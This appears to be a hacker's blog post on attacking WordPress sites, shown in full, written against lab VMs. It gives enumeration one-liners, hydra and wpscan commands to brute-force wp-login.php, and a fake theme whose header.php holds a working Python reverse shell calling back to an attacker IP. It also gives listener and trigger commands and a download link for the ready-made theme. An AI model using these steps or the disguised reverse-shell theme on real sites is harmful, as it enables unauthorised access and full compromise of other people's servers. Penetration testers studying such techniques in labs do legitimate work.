WordPress site enumeration and pwning;The below has not been tested on many versions, so your mileage using the below tactics might well vary..(the IPs are different in some exampels as post created and tested using 2 seperate machines)When testing WordPress sites, one would usually follow something similar to;
- Weak Credential auditing
- Privilege escalation of non-admin user(s)
- Obtaining shell access to server
1. WordPress site enumeration
WordPress version enumerationThere are a few methods you can try; - Check the page source for 'generator' tags;
- WordPress version enumeration
- User(s) enumeration
- Plugin & Theme enumeration
curl -s 192.168.56.102/wordpress/ | grep generator - Check if the readme.html is available in the root of the WordPress installation; (readme.html will show WordPress version information at the top)
curl -s 192.168.56.102/wordpress/readme.html | grep Version
- Check the source of the login page; /wordpress-site/wp-login.php
curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="
WordPress user(s) enumeration
On default installations users can be found by checking the user IDs;
with a nice one liner using curl and grep you can do a quick emumeration of the 1st 5 users;
for i in $(seq 1 5); do curl -s 192.168.110.105/wordpress/?author=$i | grep '<title>'; done
Cool, 2 users enumerated.
It is actually a good idea to include the -L switch to ensure that you don't miss anything with redirects.
for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done
In WordPress installations with the 'stop-user-enumeration' plugin installed other approaches could be considered;
curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'
curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'
In WordPress 4.7 a REST API was introduced to list all users which opens up other methods to view users;
curl -s http://localhost/wp-json/wp/v2/usershttps://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/WordPress Plugin & Theme enumeration
If you are lucky you will be able to browse the /wordpress_site/wp-content/plugins/
and the /wordpress_site/wp-content/themes/ directory and get a nice easy overview of what plugins and themes are installed, but this isn't very likely.
You could also fuzz the directories using wordlists specifically prepared for WordPress. seclists has some great ones and has a decent CMS section, although from my tests it didnt catch the themes.
You could for instance fuzz the plugin directory and then enumerate further on found directories to get version numbers etc.
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZAnother alternative is to use an nmap nse script to do the hard work for you;
2. Weak WordPress credential auditing
nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/
With our found admin user in our hands, lets run a quick test login with admin:nimda as credentials to see what the form information is.We can get the nitty gritty details with Inspect Element in the browser;With this new-found information we can quickly make a username file and fire up a quick bruteforce attack on the wordpress login page to check for weak password usage;
echo admin > users.txt && echo wpuser >> users.txt
hydra -L users.txt -P lists/500.txt -e nsr 192.168.110.105 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location"
Awesome, there are our credentials (yes ch3rn.. it took me a looong time to get that hydra command sorted.. ) ;
Alternative methods (much easier lol.. but we like complicated do we not?!) ;
Enumerate users, plugins and themes;
wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at
Brute forcing these enumerated users;
wpscan --users users.txt -w /root/lists/500.txt -u 192.168.110.105/wordpress/+--------------------------------------------------------------------------------------+
3. Privilege escalation of non-admin user(s)
If you weren't lucky enough to get admin credentials, there may still be a way to escalate a lesser privileged user to admin privileges. This is where the plugin and theme enumeration comes in; WordPress itself does not often appear to have privilege escalation vulnerabilities of this nature, but plugins and themes occasionally do.
Doing a quick searchsploit of wordpress escalation exploits gives a few responses, and this route is worth a quick check with the enumerated plugins and themes.
searchsploit wordpress escalation
Failing this, the enumerated plugins and themes should always be checked for exploits, which can range from information disclosure to unauthenticated LFI / RFI / RCE.4. Obtaining shell access to serverWith our nice new shiny admin creds, we head over to the wordpress Dashboard as admin, and get access to themes and plugins and the ability to install new ones.. ooohh yeah..If you are admin, you can create a fake plugin with a reverse shell so that on activation of the plugin, shell can be obtained.You can also edit the 'header.php' file of the active Theme into a reverse shell so that on refreshing of the site, reverse shell is obtained. The drawback is that this means you have to make a semi-permanent change to files and it can cause issues when trying to get back to the site, so I have been looking at alternative ways, but possible methods include;
WordPress ThemesIt is trivial to actually create your own fake theme including a reverse shell, upload and have a shell spawned by using the Live Preview only. This means there are no changes made to any files and a nice clean way to get a reverse shell. So what do we need..First to see which files are required to create a WordPress theme;https://developer.wordpress.org/themes/release/required-theme-files/I also included a header.php file which is called by index.php, the header.php is where the php reverse shell is.(the IP and PORT need to be changed to suit your setup)So we need to create these files, bundle into a folder and zip it up to create the WP theme.This is the content of my fake-theme zip file;STYLE.CSS
- Editing the main header.php script of the WordPress site to contain a reverse shell.
- Uploading a fake plugin containing a reverse shell.
- Uploading a fake theme containing a reverse shell.
Theme Name: FAKE WordPress Theme
Description: A theme to be installed to allow execution of a shell using Theme Live Preview.
License: Ours Not Yours
License URI: Ours
Tags: edit IP and PORT in header.php as required, run netcat listener, click on live preview, check for shell
Text Domain: fake-theme
<?php get_header(); ?>COMMENTS.PHP
I actually left this completely blank, possibly could have placed reverse shell code here and have the index.php call comments.php instead of header.php..I'm not sure..HEADER.PHP
<?php echo shell_exec(`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.101",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`);?>SCREENSHOT.PNG
I decided to make a .png file which is shown in the wordpress Theme page, just so you know which one to click on
Nice and subtle yeah? So, when you bundle all those files in a directory, zip it up and upload to Themes in the WordPress Dashboard, you can start your netcat listener on your attacking machine, click on the theme and choose Live Preview to get your shell. fake-theme file for those interested;http://www.mediafire.com/file/ya0qn83o0b5e3lu/fake-theme.zipSo, now when we log into the wordpress site as admin and head over to the Dashboard and the theme section, we can install this beautiful new fake theme.
After installation and viewing the Themes again we see the following;
Now when we click on the fake theme, we are presented with some information, can activate, do a Live Preview or delete.
The Live Preview won't activate it, but it will run it as a preview, and as a consequence run the php reverse shell, yeah baby..
Of course we also spawn a nicer shell and set the environment for ease of use;
python -c 'import pty; pty.spawn("/bin/bash")'
Now we can continue on our quest to root, knowing that we have not damaged or altered the server (VM) and can use that same method to gain shell access again with ease.As the theme is now installed, you can also access/load the reverse shell using curl from your attacking machine should the browser live-demo methof be giving you any grief;Start listener;
nc -lvp 31337Access/load the reverse shell located in header.php with curl;
curl 192.168.56.102/wordpress/wp-content/themes/fake-theme/header.phpHope the above of some interest to you guys & gals!